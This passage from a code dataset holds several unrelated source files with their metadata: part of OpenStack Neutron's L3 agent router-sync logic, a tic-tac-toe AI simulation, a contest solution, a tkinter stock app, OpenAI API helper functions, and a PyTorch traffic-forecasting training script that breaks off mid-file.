retry limit with router update for %s, action %s\",\n router_update.id, router_update.action)\n return\n router_update.timestamp = timeutils.utcnow()\n router_update.priority = priority\n router_update.resource = None # Force the agent to resync the router\n self._queue.add(router_update)\n\n def _process_update(self):\n if self._exiting:\n return\n\n for rp, update in self._queue.each_update_to_next_resource():\n LOG.info(\"Starting processing update %s, action %s, priority %s, \"\n \"update_id %s. Wait time elapsed: %.3f\",\n update.id, update.action, update.priority,\n update.update_id,\n update.time_elapsed_since_create)\n if update.action == UPDATE_NETWORK:\n self._process_network_update(\n router_id=update.id,\n network_id=update.resource)\n else:\n self._process_router_update(rp, update)\n\n def _process_router_update(self, rp, update):\n LOG.info(\"Starting router update for %s, action %s, priority %s, \"\n \"update_id %s. Wait time elapsed: %.3f\",\n update.id, update.action, update.priority,\n update.update_id,\n update.time_elapsed_since_create)\n if update.action == PD_UPDATE:\n self.pd.process_prefix_update()\n LOG.info(\"Finished a router update for %s IPv6 PD, \"\n \"update_id. %s. Time elapsed: %.3f\",\n update.id, update.update_id,\n update.time_elapsed_since_start)\n return\n\n routers = [update.resource] if update.resource else []\n\n not_delete_no_routers = (update.action != DELETE_ROUTER and\n not routers)\n related_action = update.action in (DELETE_RELATED_ROUTER,\n ADD_UPDATE_RELATED_ROUTER)\n if not_delete_no_routers or related_action:\n try:\n update.timestamp = timeutils.utcnow()\n routers = self.plugin_rpc.get_routers(self.context,\n [update.id])\n except Exception:\n msg = \"Failed to fetch router information for '%s'\"\n LOG.exception(msg, update.id)\n self._resync_router(update)\n return\n\n # For a related action, verify the router is still hosted here,\n # since it could have just been deleted and we don't want to\n # add it back.\n if related_action:\n routers = [r for r in routers if r['id'] == update.id]\n\n if not routers:\n removed = self._safe_router_removed(update.id)\n if not removed:\n self._resync_router(update)\n else:\n # need to update timestamp of removed router in case\n # there are older events for the same router in the\n # processing queue (like events from fullsync) in order to\n # prevent deleted router re-creation\n rp.fetched_and_processed(update.timestamp)\n LOG.info(\"Finished a router delete for %s, update_id %s. \"\n \"Time elapsed: %.3f\",\n update.id, update.update_id,\n update.time_elapsed_since_start)\n return\n\n if not self._process_routers_if_compatible(routers, update):\n self._resync_router(update)\n return\n\n rp.fetched_and_processed(update.timestamp)\n LOG.info(\"Finished a router update for %s, update_id %s. \"\n \"Time elapsed: %.3f\",\n update.id, update.update_id,\n update.time_elapsed_since_start)\n\n def _process_routers_if_compatible(self, routers, update):\n process_result = True\n for router in routers:\n if router['id'] != update.id:\n # Don't do the work here, instead create a new update and\n # enqueue it, since there could be another thread working\n # on it already and we don't want to race.\n new_action = RELATED_ACTION_MAP.get(\n update.action, ADD_UPDATE_RELATED_ROUTER)\n new_update = queue.ResourceUpdate(\n router['id'],\n priority=PRIORITY_RELATED_ROUTER,\n action=new_action)\n self._queue.add(new_update)\n LOG.debug('Queued a router update for %(router_id)s '\n '(related router %(related_router_id)s). 
'\n 'Original event action %(action)s, '\n 'priority %(priority)s. '\n 'New event action %(new_action)s, '\n 'priority %(new_priority)s',\n {'router_id': router['id'],\n 'related_router_id': update.id,\n 'action': update.action,\n 'priority': update.priority,\n 'new_action': new_update.action,\n 'new_priority': new_update.priority})\n continue\n\n try:\n self._process_router_if_compatible(router)\n except l3_exc.RouterNotCompatibleWithAgent as e:\n log_verbose_exc(e.msg, router)\n # Was the router previously handled by this agent?\n if router['id'] in self.router_info:\n LOG.error(\"Removing incompatible router '%s'\",\n router['id'])\n self._safe_router_removed(router['id'])\n except Exception:\n log_verbose_exc(\n \"Failed to process compatible router: %s\" % update.id,\n router)\n process_result = False\n return process_result\n\n def _process_routers_loop(self):\n LOG.debug(\"Starting _process_routers_loop\")\n while not self._exiting:\n self._pool.spawn_n(self._process_update)\n\n # NOTE(kevinbenton): this is set to 1 second because the actual interval\n # is controlled by a FixedIntervalLoopingCall in neutron/service.py that\n # is responsible for task execution.\n @periodic_task.periodic_task(spacing=1, run_immediately=True)\n def periodic_sync_routers_task(self, context):\n if not self.fullsync:\n return\n LOG.debug(\"Starting fullsync periodic_sync_routers_task\")\n\n # self.fullsync is True at this point. If an exception -- caught or\n # uncaught -- prevents setting it to False below then the next call\n # to periodic_sync_routers_task will re-enter this code and try again.\n\n # Context manager self.namespaces_manager captures a picture of\n # namespaces *before* fetch_and_sync_all_routers fetches the full list\n # of routers from the database. 
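`_resync_router` above stops re-queueing an update once `hit_retry_limit()` reports the cap was reached, which keeps a permanently failing router from spinning the queue forever. A toy version of that bounded-retry update object (names and the counter placement are assumptions; the real object lives in the resource processing queue module):

```python
class ResourceUpdateSketch:
    """Toy stand-in for a queued update with a retry budget."""
    def __init__(self, resource_id, max_retries=5):
        self.id = resource_id
        self.tries = 0
        self.max_retries = max_retries

    def hit_retry_limit(self):
        # Folds "count an attempt" and "check the budget" into one call for brevity.
        self.tries += 1
        return self.tries > self.max_retries

def resync(update):
    if update.hit_retry_limit():
        print("giving up on %s after %d attempts" % (update.id, update.max_retries))
        return False
    print("re-queueing %s (attempt %d)" % (update.id, update.tries))
    return True

u = ResourceUpdateSketch("router-1", max_retries=2)
while resync(u):
    pass  # two re-queues, then "giving up"
```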
This is important to correctly\n # identify stale ones.\n\n try:\n with self.namespaces_manager as ns_manager:\n self.fetch_and_sync_all_routers(context, ns_manager)\n except l3_exc.AbortSyncRouters:\n self.fullsync = True\n\n def fetch_and_sync_all_routers(self, context, ns_manager):\n prev_router_ids = set(self.router_info)\n curr_router_ids = set()\n timestamp = timeutils.utcnow()\n router_ids = []\n chunk = []\n is_snat_agent = (self.conf.agent_mode ==\n lib_const.L3_AGENT_MODE_DVR_SNAT)\n try:\n router_ids = self.plugin_rpc.get_router_ids(context)\n # fetch routers by chunks to reduce the load on server and to\n # start router processing earlier\n for i in range(0, len(router_ids), self.sync_routers_chunk_size):\n chunk = router_ids[i:i + self.sync_routers_chunk_size]\n routers = self.plugin_rpc.get_routers(context, chunk)\n LOG.debug('Processing :%r', routers)\n for r in routers:\n curr_router_ids.add(r['id'])\n ns_manager.keep_router(r['id'])\n if r.get('distributed'):\n # need to keep fip namespaces as well\n ext_net_id = (r['external_gateway_info'] or {}).get(\n 'network_id')\n if ext_net_id:\n ns_manager.keep_ext_net(ext_net_id)\n elif is_snat_agent and not r.get('ha'):\n ns_manager.ensure_snat_cleanup(r['id'])\n update = queue.ResourceUpdate(\n r['id'],\n PRIORITY_SYNC_ROUTERS_TASK,\n resource=r,\n action=ADD_UPDATE_ROUTER,\n timestamp=timestamp)\n self._queue.add(update)\n except oslo_messaging.MessagingTimeout:\n if self.sync_routers_chunk_size > SYNC_ROUTERS_MIN_CHUNK_SIZE:\n self.sync_routers_chunk_size = max(\n self.sync_routers_chunk_size // 2,\n SYNC_ROUTERS_MIN_CHUNK_SIZE)\n LOG.error('Server failed to return info for routers in '\n 'required time, decreasing chunk size to: %s',\n self.sync_routers_chunk_size)\n else:\n LOG.error('Server failed to return info for routers in '\n 'required time even with min chunk size: %s. '\n 'It might be under very high load or '\n 'just inoperable',\n self.sync_routers_chunk_size)\n raise\n except oslo_messaging.MessagingException:\n failed_routers = chunk or router_ids\n LOG.exception(\"Failed synchronizing routers '%s' \"\n \"due to RPC error\", failed_routers)\n raise l3_exc.AbortSyncRouters()\n\n self.fullsync = False\n LOG.debug(\"periodic_sync_routers_task successfully completed\")\n # adjust chunk size after successful sync\n if self.sync_routers_chunk_size < SYNC_ROUTERS_MAX_CHUNK_SIZE:\n self.sync_routers_chunk_size = min(\n self.sync_routers_chunk_size + SYNC_ROUTERS_MIN_CHUNK_SIZE,\n SYNC_ROUTERS_MAX_CHUNK_SIZE)\n\n # Delete routers that have disappeared since the last sync\n for router_id in prev_router_ids - curr_router_ids:\n ns_manager.keep_router(router_id)\n update = queue.ResourceUpdate(router_id,\n PRIORITY_SYNC_ROUTERS_TASK,\n timestamp=timestamp,\n action=DELETE_ROUTER)\n self._queue.add(update)\n\n @property\n def context(self):\n # generate a new request-id on each call to make server side tracking\n # of RPC calls easier.\n self._context.request_id = common_context.generate_request_id()\n return self._context\n\n def after_start(self):\n # Note: the FWaaS' vArmourL3NATAgent is a subclass of L3NATAgent. It\n # calls this method here. So Removing this after_start() would break\n # vArmourL3NATAgent. 
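`fetch_and_sync_all_routers` above adapts its chunk size to server load: every `MessagingTimeout` halves the chunk down to a floor, and each clean full sync grows it back by one floor-sized increment up to a ceiling. A sketch of that additive-increase, multiplicative-decrease scheme with assumed bounds:

```python
SYNC_ROUTERS_MIN_CHUNK_SIZE = 8      # assumed bounds; the real values are module constants
SYNC_ROUTERS_MAX_CHUNK_SIZE = 256

def shrink_on_timeout(chunk_size):
    # Halve, but never below the floor; at the floor there is nothing smaller to try.
    return max(chunk_size // 2, SYNC_ROUTERS_MIN_CHUNK_SIZE)

def grow_after_success(chunk_size):
    # Creep back up one "floor unit" at a time, capped at the ceiling.
    return min(chunk_size + SYNC_ROUTERS_MIN_CHUNK_SIZE, SYNC_ROUTERS_MAX_CHUNK_SIZE)

size = 256
for _ in range(3):               # three consecutive timeouts
    size = shrink_on_timeout(size)
print(size)                      # -> 32
print(grow_after_success(size))  # -> 40
```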
We need to find out whether vArmourL3NATAgent\n # can have L3NATAgentWithStateReport as its base class instead of\n # L3NATAgent.\n eventlet.spawn_n(self._process_routers_loop)\n LOG.info(\"L3 agent started\")\n\n def stop(self):\n LOG.info(\"Stopping L3 agent\")\n if self.conf.cleanup_on_shutdown:\n self._exiting = True\n for router in self.router_info.values():\n router.delete()\n\n def create_pd_router_update(self):\n router_id = None\n update = queue.ResourceUpdate(router_id,\n PRIORITY_PD_UPDATE,\n timestamp=timeutils.utcnow(),\n action=PD_UPDATE)\n self._queue.add(update)\n\n\nclass L3NATAgentWithStateReport(L3NATAgent):\n\n def __init__(self, host, conf=None):\n super(L3NATAgentWithStateReport, self).__init__(host=host, conf=conf)\n self.state_rpc = agent_rpc.PluginReportStateAPI(topics.REPORTS)\n self.failed_report_state = False\n self.agent_state = {\n 'binary': lib_const.AGENT_PROCESS_L3,\n 'host': host,\n 'availability_zone': self.conf.AGENT.availability_zone,\n 'topic': topics.L3_AGENT,\n 'configurations': {\n 'agent_mode': self.conf.agent_mode,\n 'handle_internal_only_routers':\n self.conf.handle_internal_only_routers,\n 'interface_driver': self.conf.interface_driver,\n 'log_agent_heartbeats': self.conf.AGENT.log_agent_heartbeats,\n 'extensions': self.l3_ext_manager.names()},\n 'start_flag': True,\n 'agent_type': lib_const.AGENT_TYPE_L3}\n report_interval = self.conf.AGENT.report_interval\n if report_interval:\n self.heartbeat = loopingcall.FixedIntervalLoopingCall(\n self._report_state)\n self.heartbeat.start(interval=report_interval)\n\n def _report_state(self):\n num_ex_gw_ports = 0\n num_interfaces = 0\n num_floating_ips = 0\n router_infos = self.router_info.values()\n num_routers = len(router_infos)\n for ri in router_infos:\n ex_gw_port = ri.get_ex_gw_port()\n if ex_gw_port:\n num_ex_gw_ports += 1\n num_interfaces += len(ri.router.get(lib_const.INTERFACE_KEY,\n []))\n num_floating_ips += len(ri.router.get(lib_const.FLOATINGIP_KEY,\n []))\n configurations = self.agent_state['configurations']\n configurations['routers'] = num_routers\n configurations['ex_gw_ports'] = num_ex_gw_ports\n configurations['interfaces'] = num_interfaces\n configurations['floating_ips'] = num_floating_ips\n try:\n agent_status = self.state_rpc.report_state(self.context,\n self.agent_state,\n True)\n if agent_status == agent_consts.AGENT_REVIVED:\n LOG.info('Agent has just been revived. '\n 'Doing a full sync.')\n self.fullsync = True\n self.agent_state.pop('start_flag', None)\n except AttributeError:\n # This means the server does not support report_state\n LOG.warning(\"Neutron server does not support state report. 
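`_report_state` above folds per-router statistics into the heartbeat payload before calling `report_state`. The aggregation itself is a simple fold over the router cache; a sketch over a toy `router_info` map (the dict shape stands in for the real RouterInfo objects):

```python
routers = {
    "r1": {"gw_port": True,  "interfaces": 2, "floating_ips": 1},
    "r2": {"gw_port": False, "interfaces": 1, "floating_ips": 0},
}

configurations = {
    "routers": len(routers),
    "ex_gw_ports": sum(1 for r in routers.values() if r["gw_port"]),
    "interfaces": sum(r["interfaces"] for r in routers.values()),
    "floating_ips": sum(r["floating_ips"] for r in routers.values()),
}
print(configurations)
# {'routers': 2, 'ex_gw_ports': 1, 'interfaces': 3, 'floating_ips': 1}
```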
\"\n \"State report for this agent will be disabled.\")\n self.heartbeat.stop()\n return\n except Exception:\n self.failed_report_state = True\n LOG.exception(\"Failed reporting state!\")\n return\n if self.failed_report_state:\n self.failed_report_state = False\n LOG.info(\"Successfully reported state after a previous failure.\")\n\n def after_start(self):\n eventlet.spawn_n(self._process_routers_loop)\n LOG.info(\"L3 agent started\")\n # Do the report state before we do the first full sync.\n self._report_state()\n\n self.pd.after_start()\n\n def agent_updated(self, context, payload):\n \"\"\"Handle the agent_updated notification event.\"\"\"\n self.fullsync = True\n LOG.info(\"agent_updated by server side %s!\", payload)\n","repo_name":"openstack/neutron","sub_path":"neutron/agent/l3/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":46015,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"38285741725","text":"import random\n\ngrid = [[\" \", \" \", \" \"], [\" \", \" \", \" \"], [\" \", \" \", \" \"]]\n\n\ndef printgrid(grid):\n print(\" \" + grid[0][0] + \" | \" + grid[0][1] + \" | \" + grid[0][2])\n print(\"---+---+---\")\n print(\" \" + grid[1][0] + \" | \" + grid[1][1] + \" | \" + grid[1][2])\n print(\"---+---+---\")\n print(\" \" + grid[2][0] + \" | \" + grid[2][1] + \" | \" + grid[2][2])\n\n\nwinner = \"\"\n\n\ndef win(key, grid):\n for i in range(len(grid)):\n row = grid[i]\n vert1 = grid[0][i]\n vert2 = grid[1][i]\n vert3 = grid[2][i]\n\n if row[0] == row[1] == row[2] == key:\n return True\n elif vert1 == vert2 == vert3 == key:\n return True\n\n if grid[0][0] == grid[1][1] == grid[2][2] == key:\n return True\n elif grid[2][0] == grid[1][1] == grid[0][2] == key:\n return True\n\n return False\n\n\ndef ai():\n tempgrid = []\n for i in grid:\n temp = []\n for j in i:\n temp.append(j)\n tempgrid.append(temp)\n\n # trying to win\n for j in range(len(tempgrid)):\n for i in range(len(tempgrid[j])):\n if tempgrid[j][i] != \"X\" and tempgrid[j][i] != \"O\":\n tempgrid[j][i] = \"O\"\n if win(\"O\", tempgrid):\n return [j, i]\n tempgrid = []\n for y in grid:\n temp = []\n for x in y:\n temp.append(x)\n tempgrid.append(temp)\n\n # trying to block\n for j in range(len(tempgrid)):\n for i in range(len(tempgrid[j])):\n if tempgrid[j][i] != \"X\" and tempgrid[j][i] != \"O\":\n tempgrid[j][i] = \"X\"\n if win(\"X\", tempgrid):\n return [j, i]\n tempgrid = []\n for y in grid:\n temp = []\n for x in y:\n temp.append(x)\n tempgrid.append(temp)\n\n # trying to place next to eachother\n for j in range(len(tempgrid)):\n for i in range(len(tempgrid[j])):\n if tempgrid[j][i] == \"O\":\n off = [(0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0), (-1, 1)]\n for k in range(len(off)):\n y = j + off[k][1]\n x = i + off[k][0]\n if x < 3 and x > -1 and y < 3 and y > -1 and tempgrid[y][x] == \" \":\n return [y, x]\n\n # random placment(for first turn)\n while True:\n if full():\n return 3\n y = random.randint(0, 2)\n x = random.randint(0, 2)\n if tempgrid[y][x] != \"X\":\n return [y, x]\n\n\ndef full():\n for i in grid:\n for y in i:\n if y == \" \":\n return False\n return True\n\n\ncompwin = 0\nrandomwin = 0\nties = 0\n\nfor i in range(1000):\n grid = [[\" \", \" \", \" \"], [\" \", \" \", \" \"], [\" \", \" \", \" \"]]\n\n while True:\n while True:\n if full():\n break\n y = random.randint(0, 2)\n x = random.randint(0, 2)\n if grid[y][x] == \" \":\n grid[y][x] = \"X\"\n break\n\n if full():\n if win(\"O\", grid):\n 
compwin += 1\n break\n elif win(\"X\", grid):\n randomwin += 1\n break\n elif full():\n ties += 1\n break\n\n Olis = ai()\n if Olis != 3:\n grid[Olis[0]][Olis[1]] = \"O\"\n\n if win(\"O\", grid):\n compwin += 1\n break\n elif win(\"X\", grid):\n randomwin += 1\n break\n\nprint(\"TIES: \" + str(ties))\nprint(\"RANDOM WINS: \" + str(randomwin))\nprint(\"COMPUTER WINS: \" + str(compwin))\n","repo_name":"AuritroSaha/auritro_coding_portfolio","sub_path":"JUNI/Python Level 3/AM14 - Master Project/Tic Tac Toe AI Test.py","file_name":"Tic Tac Toe AI Test.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36500541873","text":"from collections import Counter\n\nalfab = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\nt = int(input())\n\nfor _ in range(t):\n input()\n log = input()\n freq = Counter(log)\n\n #print(freq)\n\n solved = [char for char in alfab if freq[char] >= alfab.index(char) + 1]\n\n print(len(solved))\n","repo_name":"RaulMyron/programacao-competitiva","sub_path":"contests/atcoders/19-12-2023/a2.py","file_name":"a2.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35123065688","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom ApiResponse import ApiFinance\n\n\nclass TkinterApp:\n\n def __init__(self):\n self.root = tk.Tk()\n self.api_finance = ApiFinance()\n self.tkinterRun()\n\n \n def tkinterRun(self):\n self.root.geometry(\"500x400\")\n \n self.root.columnconfigure(0, weight=1)\n self.root.columnconfigure(1, weight=3)\n\n label1 = tk.Label(self.root, text = 'Enter stock ticker').grid(row=1, column=1, sticky='N', pady=2)#.pack()\n stockInput = tk.StringVar(value = 'WPC')\n bar1 = tk.Entry(self.root, textvariable=stockInput, width=50, fg=\"green\", selectbackground='yellow').grid(row=2, column=1, sticky='N', pady=2)#.pack()\n labelCurrency = tk.Label(self.root)\n labelStockPrice = tk.Label(self.root)\n #labelStockPrice.grid(row = 3, column = 0, sticky = 'W', pady =2)\n button1 = tk.Button(self.root, text=\"search\", fg='White', bg='green', height=1, width=10, command=lambda: self.button_func(stockInput,labelCurrency,labelStockPrice)).grid(row=3, column=1, sticky='N', pady=2)#.pack() \n #labelCurrency.pack()\n #labelStockPrice.pack()\n labelStockPrice.grid(row=4, column=0, sticky='W', pady=2)\n\n self.root.mainloop()\n\n def button_func(self, stockInput, labelCurrency,labelStockPrice):\n apiData = self.api_finance.api(stockInput.get())\n #labelCurrency.config(text = apiData['currency'])\n labelStockPrice.config(text = 'Stock price is ' + str(apiData['stockPrice'] )) # + str(apiData['currency'])\n\n\n","repo_name":"ArmyChicken/stocksApp","sub_path":"tkinterScript.py","file_name":"tkinterScript.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32939291314","text":"import openai\nfrom io import BytesIO\nimport tempfile\nimport os\nimport streamlit as st\n\n# Create a function to transcribe audio using Whisper\ndef transcribe_audio(api_key, audio_file):\n openai.api_key = api_key\n with BytesIO(audio_file.read()) as audio_bytes:\n # Get the extension of the uploaded file\n file_extension = os.path.splitext(audio_file.name)[-1]\n \n # Create a temporary file with the uploaded audio data and the correct extension\n with tempfile.NamedTemporaryFile(delete=False, suffix=file_extension) 
as temp_audio_file:\n temp_audio_file.write(audio_bytes.read())\n temp_audio_file.seek(0) # Move the file pointer to the beginning of the file\n \n # Transcribe the temporary audio file\n transcript = openai.Audio.translate(\"whisper-1\", temp_audio_file)\n\n return transcript\n\ndef call_gpt(api_key, prompt, model):\n openai.api_key = api_key\n response = openai.ChatCompletion.create(\n model=model,\n messages=[{\"role\": \"user\", \"content\": prompt}],\n temperature=0.5,\n max_tokens=400,\n )\n \n return response['choices'][0]['message']['content']\n\ndef call_gpt_streaming(api_key,prompt, model):\n openai.api_key = api_key\n response = openai.ChatCompletion.create(\n model=model,\n messages=[{\"role\": \"user\", \"content\": prompt}],\n temperature=0.7,\n stream=True\n )\n\n collected_events = []\n completion_text = ''\n placeholder = st.empty()\n\n for event in response:\n collected_events.append(event)\n # Check if content key exists\n if \"content\" in event['choices'][0][\"delta\"]:\n event_text = event['choices'][0][\"delta\"][\"content\"]\n completion_text += event_text\n placeholder.write(completion_text) # Write the received text\n return completion_text\n\n# Create a function to summarize the transcript using a custom prompt\ndef summarize_transcript(api_key, transcript, model, custom_prompt=None):\n openai.api_key = api_key\n prompt = f\"Please summarize the following audio transcription: {transcript}\"\n if custom_prompt:\n prompt = f\"{custom_prompt}\\n\\n{transcript}\"\n \n\n response = openai.ChatCompletion.create(\n model=model,\n messages=[{\"role\": \"user\", \"content\": prompt}],\n temperature=0.5,\n max_tokens=150,\n )\n \n summary = response['choices'][0]['message']['content']\n return summary\n\n\ndef generate_image_prompt(api_key, user_input):\n openai.api_key = api_key\n\n response = openai.ChatCompletion.create(\n model=\"gpt-4\",\n messages=[{\"role\": \"user\", \"content\": f\"Create a text that explains in a lot of details how the meme about this topic would look like: {user_input}\"}],\n temperature=0.7,\n max_tokens=50,\n )\n\n return response['choices'][0]['message']['content']\n\ndef generate_image(api_key, prompt):\n openai.api_key = api_key\n\n response = openai.Image.create(\n prompt=prompt,\n n=1,\n size=\"512x512\",\n response_format=\"url\",\n )\n\n return response['data'][0]['url']\n\ndef generate_images(api_key, prompt, n=4):\n openai.api_key = api_key\n\n response = openai.Image.create(\n prompt=prompt,\n n=n,\n size=\"256x256\",\n response_format=\"url\",\n )\n\n return response['data']","repo_name":"StanGirard/speechdigest","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"72"} +{"seq_id":"6847724998","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport argparse\nimport numpy as np\nfrom datetime import datetime\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\nsys.path.append('../../')\nfrom .utils.dataset import read_data\nfrom .utils.model import DenseNet\nfrom .utils.spatial_lstm import Mvstgn\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nimport h5py\nimport time\nfrom .libs.print_para import print_para\n\ntorch.manual_seed(22)\n\ndevice = torch.device(\"cuda\")\n\nparse = 
argparse.ArgumentParser()\nparse.add_argument('-height', type=int, default=100)\nparse.add_argument('-width', type=int, default=100)\nparse.add_argument('-traffic', type=str, default='sms')\nparse.add_argument('-nb_flow', type=int, default=1)\nparse.add_argument('-cluster', type=int, default=3)\nparse.add_argument('-close_size', type=int, default=3)\nparse.add_argument('-loss', type=str, default='l1', help='l1 | l2')\nparse.add_argument('-lr', type=float, default=1e-3)\nparse.add_argument('-weight_decay', type=float, default=5e-4, help='Weight decay (L2 loss on parameters).')\nparse.add_argument('-batch_size', type=int, default=32, help='batch size')\nparse.add_argument('-epoch_size', type=int, default=300, help='epochs')\nparse.add_argument('-rows', nargs='+', type=int, default=[40, 60])\nparse.add_argument('-cols', nargs='+', type=int, default=[40, 60])\nparse.add_argument('-test_row', type=int, default=10, help='test row')\nparse.add_argument('-test_col', type=int, default=18, help='test col')\nparse.add_argument('-last_kernel', type=int, default=1)\nparse.add_argument('-period_size', type=int, default=0)\nparse.add_argument('-trend_size', type=int, default=0)\nparse.add_argument('-test_size', type=int, default=24*7)\nparse.add_argument('-fusion', type=int, default=1)\nparse.add_argument('-crop', dest='crop', action='store_true')\nparse.add_argument('-no-crop', dest='crop', action='store_false')\nparse.set_defaults(crop=True)\nparse.add_argument('-train', dest='train', action='store_true')\nparse.add_argument('-no-train', dest='train', action='store_false')\nparse.set_defaults(train=True)\nparse.add_argument('-l2', dest='l2', help='weight decay', type=float, default=1e-4)\nparse.add_argument('-adam', dest='adam', help='use adam. Not recommended', action='store_true')\nparse.add_argument('-save_dir', type=str, default='results')\n\nopt = parse.parse_args()\n\nopt.save_dir = '{}/{}'.format(opt.save_dir, opt.traffic)\nprint(\"save dir:\", opt.save_dir)\npath_name = 'results_data'\nif not os.path.exists(path_name): \n os.makedirs(path_name) \nelse:\n print('path already exists.')\n\n\ndef get_optim(lr):\n if opt.adam:\n optimizer = optim.Adam(model.parameters(), weight_decay=opt.l2, lr=lr, eps=1e-3)\n else:\n optimizer = optim.SGD(model.parameters(), weight_decay=opt.l2, lr=lr, momentum=0.9)\n\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[0.5 * opt.epoch_size, 0.75 * opt.epoch_size], gamma=0.1)\n return optimizer, scheduler\n\ndef log(fname, s):\n if not os.path.isdir(os.path.dirname(fname)):\n os.system(\"mkdir -p \" + os.path.dirname(fname))\n f = open(fname, 'a')\n f.write(str(datetime.now()) + ': ' + s + '\\n')\n f.close()\n\nEPOCH_NUM = 0\ndef train_epoch(data_type='train'):\n \n total_loss = 0\n \n if data_type == 'train':\n model.train()\n data = train_loader\n if data_type == 'valid':\n model.eval()\n data = valid_loader\n\n start = time.time()\n for idx, (batch, target) in enumerate(data):\n optimizer.zero_grad()\n model.zero_grad()\n x = batch.float().to(device)\n y = target.float().to(device)\n\n pred = model(x)\n loss = criterion(pred, y)\n total_loss += loss.item()\n if data_type == 'train':\n loss.backward()\n optimizer.step()\n if data_type == 'train':\n time_per_EPOCH = (time.time() - start)\n print(\"{:.1f}s/epoch for training, {:.1f}m/epoch for training\".format(time_per_EPOCH, time_per_EPOCH/60))\n start = time.time()\n\n return total_loss\n\ndef train():\n os.system(\"mkdir -p \" + opt.save_dir)\n best_valid_loss = 1.0\n train_loss, valid_loss 
= [], []\n for i in range(opt.epoch_size):\n scheduler.step()\n train_loss.append(train_epoch('train'))\n valid_loss.append(train_epoch('valid'))\n\n if valid_loss[-1] < best_valid_loss:\n best_valid_loss = valid_loss[-1]\n\n torch.save({'epoch': i, 'model': model, 'train_loss': train_loss,\n 'valid_loss': valid_loss}, opt.model_filename + '.model')\n torch.save(optimizer, opt.model_filename + '.optim')\n torch.save(model.state_dict(), opt.model_filename + '.pt')\n\n log_string = ('iter: [{:d}/{:d}], train_loss: {:0.6f}, valid_loss: {:0.6f}, '\n 'best_valid_loss: {:0.6f}, lr: {:0.5f}').format((i + 1), opt.epoch_size,\n train_loss[-1],\n valid_loss[-1],\n best_valid_loss,\n opt.lr)\n if i % 2 == 0:\n print(log_string)\n log(opt.model_filename + '.log', log_string)\n\ndef predict(test_type='train'):\n predictions = []\n ground_truth = []\n loss = []\n model.eval()\n model.load_state_dict(torch.load(opt.model_filename + '.pt'))\n\n if test_type == 'train':\n data = train_loader\n elif test_type == 'test':\n data = test_loader\n elif test_type == 'valid':\n data = valid_loader\n\n with torch.no_grad():\n for idx, (c, target) in enumerate(data):\n optimizer.zero_grad()\n model.zero_grad()\n x = c.float().to(device)\n y = target.float().to(device)\n pred = model(x)\n predictions.append(pred.data.cpu())\n ground_truth.append(target.data)\n loss.append(criterion(pred, y).item())\n\n\n final_predict = np.concatenate(predictions)\n ground_truth = np.concatenate(ground_truth)\n print(\"Shape of final prediction is {}, shape of ground truth is {}\".format(final_predict.shape, ground_truth.shape))\n\n ground_truth = mmn.inverse_transform(ground_truth)\n final_predict = mmn.inverse_transform(final_predict)\n return final_predict, ground_truth\n\ndef train_valid_split(dataloader, test_size=0.2, shuffle=True, random_seed=0):\n length = len(dataloader)\n indices = list(range(0, length))\n\n if shuffle:\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n\n if type(test_size) is float:\n split = int(np.floor(test_size * length))\n elif type(test_size) is int:\n split = test_size\n else:\n raise ValueError('%s should be an int or float'.format(str))\n return indices[split:], indices[:split]\n\nif __name__ == '__main__':\n\n path = 'data/data_git_version.h5'\n feature_path = 'data/crawled_feature.csv'\n X, X_meta, X_cross, y, label, mmn = read_data(path, feature_path, opt)\n\n samples, sequences, channels, height, width = X.shape\n\n x_train, x_test = X[:-opt.test_size], X[-opt.test_size:] \n\n meta_train, meta_test = X_meta[:-opt.test_size], X_meta[-opt.test_size:]\n cross_train, cross_test = X_cross[:-opt.test_size], X_cross[-opt.test_size:]\n \n y_tr = y[:-opt.test_size]\n y_te = y[-opt.test_size:]\n\n prediction_ct = 0\n truth_ct = 0\n \n opt.model_filename = '{}/model={}-lr={}-period={}'.format(\n opt.save_dir,\n 'MVSTGN_SMS',\n opt.lr,\n opt.period_size)\n print('Saving to ' + opt.model_filename)\n\n y_train = y_tr \n y_test = y_te \n\n train_data = list(zip(*[x_train, y_train]))\n test_data = list(zip(*[x_test, y_test]))\n\n train_idx, valid_idx = train_valid_split(train_data, 0.1)\n train_sampler = SubsetRandomSampler(train_idx)\n valid_sampler = SubsetRandomSampler(valid_idx)\n\n train_loader = DataLoader(train_data, batch_size=opt.batch_size, sampler=train_sampler,\n num_workers=0, pin_memory=True)\n valid_loader = DataLoader(train_data, batch_size=opt.batch_size, sampler=valid_sampler,\n num_workers=0, pin_memory=True)\n\n test_loader = DataLoader(test_data, batch_size=opt.batch_size, 
